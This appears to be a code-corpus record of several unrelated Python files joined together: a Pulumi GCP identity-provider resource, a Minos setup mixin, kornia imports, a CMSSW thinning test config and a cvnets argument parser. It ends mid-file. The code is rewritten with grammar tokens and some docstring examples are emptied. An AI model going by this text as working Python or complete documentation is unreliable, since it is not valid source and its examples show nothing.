            oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
            project: Optional[pulumi.Input[str]] = None,
            state: Optional[pulumi.Input[str]] = None,
            workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
            workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None) -> 'WorkloadIdentityPoolProvider':
        """
        Get an existing WorkloadIdentityPoolProvider resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters.
If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. 
For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. 
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. 
"""<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_WorkloadIdentityPoolProviderState.__new__(_WorkloadIdentityPoolProviderState)<line_sep>__props__.__dict__["attribute_condition"]=attribute_condition<line_sep>__props__.__dict__["attribute_mapping"]=attribute_mapping<line_sep>__props__.__dict__["aws"]=aws<line_sep>__props__.__dict__["description"]=description<line_sep>__props__.__dict__["disabled"]=disabled<line_sep>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["name"]=name<line_sep>__props__.__dict__["oidc"]=oidc<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["state"]=state<line_sep>__props__.__dict__["workload_identity_pool_id"]=workload_identity_pool_id<line_sep>__props__.__dict__["workload_identity_pool_provider_id"]=workload_identity_pool_provider_id<line_sep><return>WorkloadIdentityPoolProvider(resource_name opts=opts __props__=__props__)<block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>pulumi.Output[Optional[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. 
The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>pulumi.Output[Optional[Mapping[str str]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. 
For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderAws']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. 
"""<line_sep><return>pulumi.get(self "aws")<block_end>@property@pulumi.getter<def_stmt>description self<arrow>pulumi.Output[Optional[str]]<block_start>""" A description for the provider. Cannot exceed 256 characters. """<line_sep><return>pulumi.get(self "description")<block_end>@property@pulumi.getter<def_stmt>disabled self<arrow>pulumi.Output[Optional[bool]]<block_start>""" Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """<line_sep><return>pulumi.get(self "disabled")<block_end>@property@pulumi.getter(name="displayName")<def_stmt>display_name self<arrow>pulumi.Output[Optional[str]]<block_start>""" A display name for the provider. Cannot exceed 32 characters. """<line_sep><return>pulumi.get(self "display_name")<block_end>@property@pulumi.getter<def_stmt>name self<arrow>pulumi.Output[str]<block_start>""" The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. """<line_sep><return>pulumi.get(self "name")<block_end>@property@pulumi.getter<def_stmt>oidc self<arrow>pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderOidc']]<block_start>""" An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """<line_sep><return>pulumi.get(self "oidc")<block_end>@property@pulumi.getter<def_stmt>project self<arrow>pulumi.Output[str]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@property@pulumi.getter<def_stmt>state self<arrow>pulumi.Output[str]<block_start>""" The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. 
Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. """<line_sep><return>pulumi.get(self "state")<block_end>@property@pulumi.getter(name="workloadIdentityPoolId")<def_stmt>workload_identity_pool_id self<arrow>pulumi.Output[str]<block_start>""" The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_id")<block_end>@property@pulumi.getter(name="workloadIdentityPoolProviderId")<def_stmt>workload_identity_pool_provider_id self<arrow>pulumi.Output[str]<block_start>""" The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_provider_id")<block_end><block_end>
<import_from_future_stmt> annotations <import_stmt>logging<import_stmt>warnings<import_from_stmt>pathlib Path <import_from_stmt>typing TYPE_CHECKING Optional Type TypeVar Union <import_from_stmt>.object Object <if_stmt>TYPE_CHECKING<block_start><import_from_stmt>.config Config <block_end>logger=logging.getLogger(__name__)<line_sep>S=TypeVar("S" bound="SetupMixin")<class_stmt>SetupMixin(Object)<block_start>"""Setup Mixin class."""<def_stmt>__init__ self *args already_setup:bool=<false> **kwargs<block_start>super().__init__(**kwargs)<line_sep>self._already_setup=already_setup<block_end>@property<def_stmt>already_setup self<arrow>bool<block_start>"""Already Setup getter. :return: A boolean value. """<line_sep><return>self._already_setup<block_end>@property<def_stmt>already_destroyed self<arrow>bool<block_start>"""Already Destroy getter. :return: A boolean value. """<line_sep><return><not>self._already_setup<block_end>@classmethod<def_stmt>from_config cls:Type[S] config:Optional[Union[Config Path]]=<none> **kwargs<arrow>S<block_start>"""Build a new instance from config. :param config: Config instance. If `None` is provided, default config is chosen. :param kwargs: Additional named arguments. :return: A instance of the called class. 
"""<if_stmt>isinstance(config Path)<block_start><import_from_stmt>.config Config <line_sep>config=Config(config)<block_end><if_stmt>config<is><none><block_start><import_from_stmt>.config Config <import_from_stmt>.injections Inject <line_sep>config=Inject.resolve(Config)<block_end>logger.info(f"Building a {cls.__name__!r} instance from config...")<line_sep><return>cls._from_config(config=config **kwargs)<block_end>@classmethod<def_stmt>_from_config cls:Type[S] config:Config **kwargs<arrow>S<block_start><return>cls(**kwargs)<block_end><async_keyword><def_stmt>__aenter__ self:S<arrow>S<block_start><await>self.setup()<line_sep><return>self<block_end><async_keyword><def_stmt>setup self<arrow><none><block_start>"""Setup miscellaneous repository things. :return: This method does not return anything. """<if_stmt><not>self._already_setup<block_start>logger.debug(f"Setting up a {type(self).__name__!r} instance...")<line_sep><await>self._setup()<line_sep>self._already_setup=<true><block_end><block_end><async_keyword><def_stmt>_setup self<arrow><none><block_start><return><block_end><async_keyword><def_stmt>__aexit__ self exc_type exc_value exc_traceback<block_start><await>self.destroy()<block_end><async_keyword><def_stmt>destroy self<arrow><none><block_start>"""Destroy miscellaneous repository things. :return: This method does not return anything. """<if_stmt>self._already_setup<block_start>logger.debug(f"Destroying a {type(self).__name__!r} instance...")<line_sep><await>self._destroy()<line_sep>self._already_setup=<false><block_end><block_end><async_keyword><def_stmt>_destroy self<arrow><none><block_start>"""Destroy miscellaneous repository things."""<block_end><def_stmt>__del__ self<block_start><if_stmt><not>getattr(self "already_destroyed" <true>)<block_start>warnings.warn(f"A not destroyed {type(self).__name__!r} instance is trying to be deleted..." 
ResourceWarning)<block_end><block_end><block_end><class_stmt>MinosSetup(SetupMixin)<block_start>"""Minos Setup class."""<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead." DeprecationWarning)<line_sep>super().__init__(*args **kwargs)<block_end><block_end>
<import_from_stmt>kornia.augmentation._3d.intensity.equalize RandomEqualize3D<import_from_stmt>kornia.augmentation._3d.intensity.motion_blur RandomMotionBlur3D<line_sep>
# Configuration file for RefTest_t <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("TEST")<line_sep>process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(2))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.WhatsItESProducer=cms.ESProducer("WhatsItESProducer")<line_sep>process.DoodadESSource=cms.ESSource("DoodadESSource")<line_sep>process.Thing=cms.EDProducer("ThingProducer" offsetDelta=cms.int32(1))<line_sep>process.OtherThing=cms.EDProducer("OtherThingProducer")<line_sep>process.thingProducer=cms.EDProducer("ThingProducer" offsetDelta=cms.int32(100) nThings=cms.int32(50))<line_sep>process.trackOfThingsProducerA=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(0 1 2 3 4 5 6 7 8))<line_sep>process.trackOfThingsProducerB=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(0 1 2 3))<line_sep>process.trackOfThingsProducerC=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(4 5 6 7))<line_sep>process.trackOfThingsProducerD=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17 18))<line_sep>process.trackOfThingsProducerDMinus=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17))<line_sep>process.trackOfThingsProducerDPlus=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17 18 21))<line_sep>process.trackOfThingsProducerE=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14))<line_sep>process.trackOfThingsProducerF=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') 
keysToReference=cms.vuint32(14 15 16 17))<line_sep>process.trackOfThingsProducerG=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(20 21 22 23 24 25 26 27 28))<line_sep>process.trackOfThingsProducerH=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(20 21 22 23))<line_sep>process.trackOfThingsProducerI=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(24 25 26 27))<line_sep>process.trackOfThingsProducerJ=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(30 31 32 33 34 35 36 37 38))<line_sep>process.trackOfThingsProducerK=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(30 31 32 33))<line_sep>process.trackOfThingsProducerL=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(34 35 36 37))<line_sep>process.trackOfThingsProducerM=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(40 41 42 43 44 45 46 47 48))<line_sep>process.trackOfThingsProducerN=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(40 41 42 43))<line_sep>process.trackOfThingsProducerO=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(44 45 46 47))<line_sep>process.thinningThingProducerA=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerA') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerB=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerA') trackTag=cms.InputTag('trackOfThingsProducerB') offsetToThinnedKey=cms.uint32(0) 
expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerC=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerA') trackTag=cms.InputTag('trackOfThingsProducerC') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerD=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerD') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerE=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerD') trackTag=cms.InputTag('trackOfThingsProducerE') offsetToThinnedKey=cms.uint32(10) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerF=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerD') trackTag=cms.InputTag('trackOfThingsProducerF') offsetToThinnedKey=cms.uint32(10) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerG=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerG') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerH=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerG') trackTag=cms.InputTag('trackOfThingsProducerH') offsetToThinnedKey=cms.uint32(20) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerI=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerG') trackTag=cms.InputTag('trackOfThingsProducerI') offsetToThinnedKey=cms.uint32(20) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerJ=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerJ') offsetToThinnedKey=cms.uint32(0) 
expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerK=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerJ') trackTag=cms.InputTag('trackOfThingsProducerK') offsetToThinnedKey=cms.uint32(30) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerL=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerJ') trackTag=cms.InputTag('trackOfThingsProducerL') offsetToThinnedKey=cms.uint32(30) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerM=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerM') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerN=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerM') trackTag=cms.InputTag('trackOfThingsProducerN') offsetToThinnedKey=cms.uint32(40) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerO=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerM') trackTag=cms.InputTag('trackOfThingsProducerO') offsetToThinnedKey=cms.uint32(40) expectedCollectionSize=cms.uint32(9))<line_sep>process.out=cms.OutputModule("PoolOutputModule" fileName=cms.untracked.string('goodDataFormatsFWLite.root') outputCommands=cms.untracked.vstring('keep *' 'drop *_thingProducer_*_*' 'drop *_thinningThingProducerD_*_*' 'drop *_thinningThingProducerH_*_*' 'drop *_thinningThingProducerI_*_*' 'drop *_thinningThingProducerJ_*_*' 'drop *_thinningThingProducerK_*_*' 'drop *_thinningThingProducerL_*_*' 'drop *_thinningThingProducerM_*_*' 'drop *_thinningThingProducerN_*_*' ))<line_sep>process.out2=cms.OutputModule("PoolOutputModule" fileName=cms.untracked.string('good2DataFormatsFWLite.root'))<line_sep>process.out_other=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep 
edmtestOtherThings_*_*_*' 'keep *_TriggerResults_*_*') fileName=cms.untracked.string('other_onlyDataFormatsFWLite.root'))<line_sep>process.thinningTestPath=cms.Path(process.thingProducer<times>process.trackOfThingsProducerA<times>process.trackOfThingsProducerB<times>process.trackOfThingsProducerC<times>process.trackOfThingsProducerD<times>process.trackOfThingsProducerDMinus<times>process.trackOfThingsProducerDPlus<times>process.trackOfThingsProducerE<times>process.trackOfThingsProducerF<times>process.trackOfThingsProducerG<times>process.trackOfThingsProducerH<times>process.trackOfThingsProducerI<times>process.trackOfThingsProducerJ<times>process.trackOfThingsProducerK<times>process.trackOfThingsProducerL<times>process.trackOfThingsProducerM<times>process.trackOfThingsProducerN<times>process.trackOfThingsProducerO<times>process.thinningThingProducerA<times>process.thinningThingProducerB<times>process.thinningThingProducerC<times>process.thinningThingProducerD<times>process.thinningThingProducerE<times>process.thinningThingProducerF<times>process.thinningThingProducerG<times>process.thinningThingProducerH<times>process.thinningThingProducerI<times>process.thinningThingProducerJ<times>process.thinningThingProducerK<times>process.thinningThingProducerL<times>process.thinningThingProducerM<times>process.thinningThingProducerN<times>process.thinningThingProducerO)<line_sep>process.p=cms.Path(process.Thing<times>process.OtherThing)<line_sep>process.outp=cms.EndPath(process.out<times>process.out2<times>process.out_other)<line_sep>
# # For licensing see accompanying LICENSE file. # Copyright (C) 2022 Apple Inc. All Rights Reserved. # <import_stmt>argparse<import_from_stmt>typing Optional<import_from_stmt>data.sampler arguments_sampler<import_from_stmt>data.collate_fns arguments_collate_fn<import_from_stmt>options.utils load_config_file<import_from_stmt>data.datasets arguments_dataset<import_from_stmt>cvnets arguments_model arguments_nn_layers arguments_ema<import_from_stmt>cvnets.anchor_generator arguments_anchor_gen<import_from_stmt>loss_fn arguments_loss_fn<import_from_stmt>optim arguments_optimizer<import_from_stmt>optim.scheduler arguments_scheduler<import_from_stmt>common SUPPORTED_MODALITIES<import_from_stmt>data.transforms arguments_augmentation<import_from_stmt>metrics arguments_stats<import_from_stmt>data.video_reader arguments_video_reader<import_from_stmt>cvnets.matcher_det arguments_box_matcher<import_from_stmt>utils logger<class_stmt>ParseKwargs(argparse.Action)<block_start><def_stmt>__call__ self parser namespace values option_string=<none><block_start>namespace_dict=vars(namespace)<if_stmt>len(values)<g>0<block_start>override_dict={}<line_sep># values are list of key-value pairs <for_stmt>value values<block_start>key=<none><try_stmt><block_start>key,value=value.split("=")<block_end><except_stmt>ValueError<as>e<block_start>logger.error("For override arguments, a key-value pair of the form key=value is expected")<block_end><if_stmt>key<in>namespace_dict<block_start>value_namespace=namespace_dict[key]<if_stmt>value_namespace<is><none><and>value<is><none><block_start>value=<none><block_end><elif_stmt>value_namespace<is><none><and>value<is><not><none># possibly a string or list of strings or list of integers # check if string is a list or not <block_start>value=value.split(",")<if_stmt>len(value)<eq>1# its a string <block_start>value=str(value[0])<line_sep># check if its empty string or not 
<if_stmt>value<eq>""<or>value.lower()<eq>"none"<block_start>value=<none><block_end><block_end><else_stmt># its a list of integers or strings <block_start><try_stmt># convert to int <block_start>value=[int(v)<for>v value]<block_end><except_stmt># pass because its a string <block_start><pass><block_end><block_end><block_end><else_stmt><block_start><try_stmt><block_start><if_stmt>value.lower()<eq>"true"# check for boolean <block_start>value=<true><block_end><elif_stmt>value.lower()<eq>"false"<block_start>value=<false><block_end><else_stmt><block_start>desired_type=type(value_namespace)<line_sep>value=desired_type(value)<block_end><block_end><except_stmt>ValueError<as>e<block_start>logger.warning("Type mismatch while over-riding. Skipping key: {}".format(key))<line_sep><continue><block_end><block_end>override_dict[key]=value<block_end><block_end>setattr(namespace "override_args" override_dict)<block_end><else_stmt><block_start>setattr(namespace "override_args" <none>)<block_end><block_end><block_end><def_stmt>arguments_common parser:argparse.ArgumentParser<arrow>argparse.ArgumentParser<block_start>group=parser.add_argument_group(title="Common arguments" description="Common arguments")<line_sep>group.add_argument("--common.seed" type=int default=0 help="Random seed")<line_sep>group.add_argument("--common.config-file" type=str default=<none> help="Configuration file")<line_sep>group.add_argument("--common.results-loc" type=str default="results" help="Directory where results will be stored" )<line_sep>group.add_argument("--common.run-label" type=str default="run_1" help="Label id for the current run" )<line_sep>group.add_argument("--common.resume" type=str default=<none> help="Resume location")<line_sep>group.add_argument("--common.finetune_imagenet1k" type=str default=<none> help="Checkpoint location to be used for finetuning" )<line_sep>group.add_argument("--common.finetune_imagenet1k-ema" type=str default=<none> help="EMA Checkpoint location to be used for finetuning" 
)<line_sep>group.add_argument("--common.mixed-precision" action="store_true" help="Mixed precision training")<line_sep>group.add_argument("--common.accum-freq" type=int default=1 help="Accumulate gradients for this number of iterations" )<line_sep>group.add_argument("--common.accum-after-epoch" type=int default=0 help="Start accumulation after this many epochs" )<line_sep>group.add_argument("--common.log-freq" type=int default=100 help="Display after these many iterations" )<line_sep>group.add_argument("--common.auto-resume" action="store_true" help="Resume training from the last checkpoint" )<line_sep>group.add_argument("--common.grad-clip" type=float default=<none> help="Gradient clipping value")<line_sep>group.add_argument("--common.k-best-checkpoints" type=int default=5 help="Keep k-best checkpoints" )<line_sep>group.add_argument("--common.inference-modality" type=str default="image" choices=SUPPORTED_MODALITIES help="Inference modality. Image or videos" )<line_sep>group.add_argument("--common.channels-last" action="store_true" default=<false> help="Use channel last format during training. "<concat>"Note 1: that some models may not support it, so we recommend to use it with caution"<concat>"Note 2: Channel last format does not work with 1-, 2-, and 3- tensors. "<concat>"Therefore, we support it via custom collate functions" )<line_sep>group.add_argument("--common.tensorboard-logging" action="store_true" help="Enable tensorboard logging" )<line_sep>group.add_argument("--common.bolt-logging" action="store_true" help="Enable bolt logging")<line_sep>group.add_argument("--common.override-kwargs" nargs="*" action=ParseKwargs help="Override arguments. Example. 
To override the value of --sampler.vbs.crop-size-width, "<concat>"we can pass override argument as "<concat>"--common.override-kwargs sampler.vbs.crop_size_width=512 \n "<concat>"Note that keys in override arguments do not contain -- or -" )<line_sep>group.add_argument("--common.enable-coreml-compatible-module" action="store_true" help="Use coreml compatible modules (if applicable) during inference" )<line_sep>group.add_argument("--common.debug-mode" action="store_true" help="You can use this flag for debugging purposes." )<line_sep><return>parser<block_end><def_stmt>arguments_ddp parser:argparse.ArgumentParser<arrow>argparse.ArgumentParser<block_start>group=parser.add_argument_group(title="DDP arguments" description="DDP arguments")<line_sep>group.add_argument("--ddp.disable" action="store_true" help="Don't use DDP")<line_sep>group.add_argument("--ddp.rank" type=int default=0 help="Node rank for distributed training")<line_sep>group.add_argument("--ddp.world-size" type=int default=-1 help="World size for DDP")<line_sep>group.add_argument("--ddp.dist-url" type=str default=<none> help="DDP URL")<line_sep>group.add_argument("--ddp.dist-port" type=int default=30786 help="DDP Port. Only used when --ddp.dist-url is not specified" )<line_sep>group.add_argument("--ddp.device-id" type=int default=<none> help="Device ID")<line_sep>group.add_argument("--ddp.no-spawn" action="store_true" help="Don't use DDP with spawn")<line_sep>group.add_argument("--ddp.backend" type=str default="nccl" help="DDP backend. Default is nccl")<line_sep>group.add_argument("--ddp.find-unused-params" action="store_true" help="Find unused params in model. 
